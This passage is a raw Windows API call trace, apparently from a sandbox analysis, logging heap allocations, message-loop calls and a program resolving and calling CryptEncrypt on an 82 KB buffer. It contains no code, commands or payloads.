RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0152.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0152.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0152.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0152.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0152.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0152.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0152.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0152.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0152.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c38 [0152.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0152.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0152.804] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0152.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54530 [0152.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0152.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0152.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0152.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0152.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0152.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0152.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0152.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0152.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0152.805] CryptEncrypt (in: hKey=0xa870d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x14189, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x14190) returned 1 [0152.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0152.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0152.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0152.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0152.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0152.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0152.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0152.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0152.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0152.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0152.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0152.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0152.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0152.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0152.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0152.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0152.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0152.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0152.807] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.807] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0152.807] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.807] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.807] CharLowerBuffW (in: lpsz="byte[82320]", cchLength=0xb | out: lpsz="byte[82320]") returned 0xb [0152.811] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0152.817] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0152.817] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0152.817] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0152.817] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0152.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0152.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0152.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0152.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0152.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0152.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0152.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0152.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0152.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0152.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0152.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0152.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0152.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0152.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0152.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0152.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0152.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0152.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0152.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0152.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0152.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0152.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0152.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0152.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0152.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0152.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0152.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0152.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0152.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14189) returned 0x2ea8660 [0152.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8660 | out: hHeap=0x970000) returned 1 [0152.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0152.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0152.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0152.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0152.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0152.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0152.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0152.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0152.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0152.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0152.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0152.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0152.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0152.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0152.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0152.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0152.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0152.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0152.906] RtlAllocateHeap (HeapHandle=0x970000, 